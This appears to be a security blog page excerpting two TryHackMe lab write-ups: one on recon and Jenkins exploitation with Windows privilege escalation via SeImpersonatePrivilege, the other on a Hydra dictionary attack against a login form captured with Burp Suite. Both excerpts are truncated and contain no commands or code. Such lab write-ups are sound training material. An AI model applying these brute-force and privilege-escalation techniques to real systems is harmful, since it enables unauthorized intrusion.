diannaosec

The Alfred box from  thm teaches us more about attacking jenkins and abusing the SeImpersonatePrivilege to perform priv esc on a windows system...   A quick nmap scan showed that three common tcp ports were open - port 8080 seemed to be the most likely one to be serving jenkins. It would be easy at this point to navigate to the webpages, but I wanted to try eyewitness on them first. This may seem pointless (and it is!) for such a room as this one, but eyewitness is useful when web app testing, especially if there are lots of domains to check. It gives us a good high level overview of what we are up against. The first step with eyewitness is to create a file which contains the domains to be targeted. I created a .txt file to do this. Eyewitness provides us with an html report which can be opened. In this example, the results have been saved into a directory using the -d flag. We can see the results there, too. The scan unsurprisingly revealed that jenkins was running on port 8...

This box on thm   does not need to be scanned with nmap as the path to exploitation is via the web app which is running on the default http port 80. We do not need to do any directory busting, either, as the link to the login page is easily found on the home page. The first question asks us about the name of the creepy clown picture - we could do a reverse image search using google, but I think most people know who it is. Once I got to the login page, I intercepted the post request with the test username and password with burpsuite. This enabled me to find the body of the post request along with the path to the login.aspx resource which are both needed to perform a dictionary attack using hydra. Dictionary attacks are forms of brute force attacks in which we use specially crafted wordlists of possible usernames and / or passwords instead of bruteforcing every possible combination of characters.   I performed a dictionary attack against a username based off the clown picture to...